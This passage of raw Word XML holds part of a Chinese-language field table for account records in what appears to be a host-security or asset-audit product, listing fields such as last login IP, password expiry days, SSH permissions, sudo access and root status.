              <w:t xml:space="preserve">登录状态，0不可登入 1不可交互登入 2可交互登入，3 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>key&amp;pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>登陆 ，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F78C6BD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE25DC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastLoginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40338344" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133F8C7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07FD6783" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后登录时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="11DA5733" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="776CF256" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdMaxDays</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2999B77E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09212622" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57C09328" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码到期天数， null为不限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DB2AF6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00500810" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdMinDays</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1951FAB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790B50EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="422CD9F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码多少天后可修改，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>为不限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1763842D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B00A224" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdWarnDays</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42592C19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71FD9FEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29ED8066" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码到期告警天数，null为不限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1918C75F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD271E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sshAcl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2767EC81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E8DEF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78BD815D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>~./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>访问权限, 如”777”, “666”，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2ADECD1E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66A54148" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CC642B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CFA6556" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0E5BA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>备注，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42A5324D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="406FBB42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastLoginTty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196FB822" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF7AC11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5190FF76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后登录终端，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="698B5756" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5687850B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastLoginIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2807E55E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F70FFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E2CD8F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后登录</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B007F7C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21A26A84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>expireTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EDD0F7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A7F777" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13CD6DF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>到期时间，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74A20C08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D27A152" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>expired</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2464A87F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A0E495" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6DF6CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否过期</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17DC0A06" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07B48EF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fullName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34DD372E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="259AA1F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3843B0A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户全名，仅Windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E1A2232" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F79537B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudoAccesses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C848494" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DEF503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>shell：varchar(128) user：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E6A465C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>权限 shell:权限 user:用户权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58FC34E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B9EABC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51310CC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C3B7BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6C7CCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否是root，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43D38BB5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E85CAB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DBDED86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A4E05E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E440DD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户描述，仅Windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6970D160" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25A364D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="085F5309" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C014115" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="672AA109" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">账号类型 仅windows可用 1 user 2 组 4 别名组 5 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>WellKonwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>组 6 已删除用户组 8 未知类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C679964" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281D3A6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>lastChangPwdTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04572651" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E65A62D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA4E164" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码最后修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
